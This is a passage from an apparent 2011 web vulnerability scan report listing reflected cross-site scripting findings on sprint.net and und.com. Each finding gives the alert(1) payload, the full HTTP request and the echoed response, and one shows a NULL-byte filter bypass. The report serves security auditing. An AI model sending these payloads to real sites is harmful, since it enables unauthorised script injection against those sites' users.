GET /mine0b69"><script>alert(1)</script>f9addac0cb8/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css,compass_ui/gallery/s3Slider_mod.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:03:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/mine0b69"><script>alert(1)</script>f9addac0cb8/" />
...[SNIP]...

5.84. http://www.und.com/allaccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /allaccess/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9585"><script>alert(1)</script>1f949ff99a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /allaccesse9585"><script>alert(1)</script>1f949ff99a/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:58 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/allaccesse9585"><script>alert(1)</script>1f949ff99a/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.85. http://www.und.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 534b1"><script>alert(1)</script>ea040958e16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico534b1"><script>alert(1)</script>ea040958e16 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.und.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/favicon.ico534b1"><script>alert(1)</script>ea040958e16','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /gametracker/launch/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bd4"><script>alert(1)</script>f100731304a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker71bd4"><script>alert(1)</script>f100731304a/launch/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker71bd4"><script>alert(1)</script>f100731304a/launch/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /gametracker/launch/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed840"><script>alert(1)</script>a1f143f8f78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker/launched840"><script>alert(1)</script>a1f143f8f78/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:55 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker/launched840"><script>alert(1)</script>a1f143f8f78/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.88. http://www.und.com/nd.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /nd.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 589ca"><script>alert(1)</script>85d9b50e458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nd.ico589ca"><script>alert(1)</script>85d9b50e458 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:54:32 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/nd.ico589ca"><script>alert(1)</script>85d9b50e458','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.89. http://www.und.com/photogallery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /photogallery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141e8"><script>alert(1)</script>d67fe75be5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /photogallery141e8"><script>alert(1)</script>d67fe75be5d/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:59 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/photogallery141e8"><script>alert(1)</script>d67fe75be5d/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11ba5"><script>alert(1)</script>fc13649fd00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f60b2"><script>alert(1)</script>7e2fb4e049d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30b6e"><script>alert(1)</script>b2282aeecfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99832"><script>alert(1)</script>82a7a238541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0614"><script>alert(1)</script>104a0f6e999 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:11 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34139"><script>alert(1)</script>b578545b794 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:12 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984d1"><script>alert(1)</script>4b37886c489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:14 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88998"><script>alert(1)</script>57c6a7a77bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:10 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00172bf"><script>alert(1)</script>a3efd022b7f was submitted in the REST URL parameter 1. This input was echoed as 172bf"><script>alert(1)</script>a3efd022b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:45 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
